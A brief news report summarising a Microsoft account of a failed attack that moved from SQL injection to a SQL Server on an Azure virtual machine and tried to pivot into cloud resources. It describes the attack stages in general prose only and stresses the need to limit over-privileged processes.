In a recent report, Microsoft has unveiled details of a cyber attack campaign where threat actors attempted, unsuccessfully, to breach a cloud environment through an SQL Server instance. Security researchers revealed that the attackers exploited a SQL injection vulnerability in an application, gaining access and elevated permissions on a Microsoft SQL Server instance deployed on an Azure Virtual Machine.
Despite their initial success, the threat actors failed to progress to additional cloud resources using the server’s cloud identity. The attack involved SQL injection, reconnaissance, downloading of executables, establishing persistence through a scheduled task, and attempting exfiltration via a publicly accessible tool named webhook[.]site.
The attackers sought to leverage the cloud identity of the SQL Server instance but encountered an unspecified error, resulting in the failure of their operation. This incident highlights the growing sophistication of cloud-based attack techniques, emphasizing the need for robust security measures to protect against over-privileged processes and potential risks to SQL Server instances and connected cloud resources.
